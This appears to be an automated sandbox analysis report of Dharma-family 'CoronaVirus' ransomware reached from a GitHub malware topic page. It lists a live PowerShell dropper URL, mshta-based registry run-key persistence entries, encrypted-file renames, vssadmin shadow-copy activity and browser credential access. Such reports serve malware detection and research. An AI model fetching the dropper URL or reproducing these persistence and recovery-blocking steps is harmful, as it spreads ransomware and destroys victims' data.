dharma | hxxps://github[.]com/topics/virus-library

Resubmissions

04-04-2023 18:24

230404-w2jtpabb2v 10

04-04-2023 18:17

230404-wxfapshb97 7

04-04-2023 18:06

230404-wpzpdahb48 8

Analysis

max time kernel
993s
max time network
995s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
04-04-2023 18:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/topics/virus-library

Score

10^/10

dharma persistence ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

68 4376 powershell.exe

flow	pid	process
68	4376	powershell.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\SwitchEdit.tiff	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\SyncTest.tiff	Ransomware.CoronaVirus.exe

Drops startup file 5 IoCs

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ransomware.CoronaVirus.exe	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Ransomware.CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	Ransomware.CoronaVirus.exe

Executes dropped EXE 1 IoCs

Processes:

Ransomware.CoronaVirus.exe

pid process

5088 Ransomware.CoronaVirus.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5088	Ransomware.CoronaVirus.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ransomware.CoronaVirus.exe = "C:\\Windows\\System32\\Ransomware.CoronaVirus.exe"	Ransomware.CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	Ransomware.CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	Ransomware.CoronaVirus.exe

Drops desktop.ini file(s) 64 IoCs

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Users\Public\Documents\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1311743041-1167936498-546579926-1000\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Ransomware.CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Ransomware.CoronaVirus.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 2 IoCs

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
File created	C:\Windows\System32\Ransomware.CoronaVirus.exe	Ransomware.CoronaVirus.exe
File created	C:\Windows\System32\Info.hta	Ransomware.CoronaVirus.exe

Drops file in Program Files directory 64 IoCs

Processes:

Ransomware.CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\System\Ole DB\msdatl3.dll	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\10909_36x36x32.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Roundrect_White@1x.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\dbghelp.dll.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxSignature.p7x	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-black_scale-125.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\ui-strings.js.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\vcruntime140.dll.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\resources.pri	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Images\moji_mask.contrast-black.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\AppStore_icon.svg.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ui-strings.js.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado27.tlb	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\Catalog.json	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Windows NT\Accessories\de-DE\wordpad.exe.mui	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyLetter.dotx.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Themes\jumbo.jpg	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-256_altform-unplated.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\MSOINTL.DLL.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\join.avi	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-ms.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5664_20x20x32.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOInstallerUI.dll	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\bin\ssv.dll.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\spider\Web_Surfing_.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ProviderShared.dll	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue II.xml.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7357_40x40x32.png	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Xaml.Toolkit\Assets\Buttons\Menu\Menu_black-over.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\CardBacks\Autumn.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png	Ransomware.CoronaVirus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.VideoTk.dll	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\fr-FR\msinfo32.exe.mui	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\rsod\excelmui.msi.16.en-us.boot.tree.dat.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\EXPLODE.WAV.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Mozilla Firefox\private_browsing.VisualElementsManifest.xml.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\beach_12d.png	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe\AppxManifest.xml	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-ppd.xrm-ms.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg	Ransomware.CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\rsod\onenotemui.msi.16.en-us.tree.dat.id-37101E98.[coronavirus@qq.com].ncov	Ransomware.CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\SurfaceProfiles\canvas_flat_512x512_nm.png	Ransomware.CoronaVirus.exe

Drops file in Windows directory 8 IoCs

Processes:

SearchUI.exetaskmgr.exeSecHealthUI.exesystemreset.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4272278488\3302449443.pri	SecHealthUI.exe
File created	C:\Windows\rescache\_merged\4272278488\3302449443.pri	taskmgr.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	systemreset.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	systemreset.exe
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2848 4376 WerFault.exe powershell.exe
7828 9304 WerFault.exe SecHealthUI.exe

pid	pid_target	process	target process
2848	4376	WerFault.exe	powershell.exe
7828	9304	WerFault.exe	SecHealthUI.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exeSearchUI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

7744 vssadmin.exe
5360 vssadmin.exe

pid	process
7744	vssadmin.exe
5360	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133251063458256339"	chrome.exe

Modifies registry class 29 IoCs

Processes:

SearchUI.exechrome.exeOpenWith.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "129"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "488"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "359"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
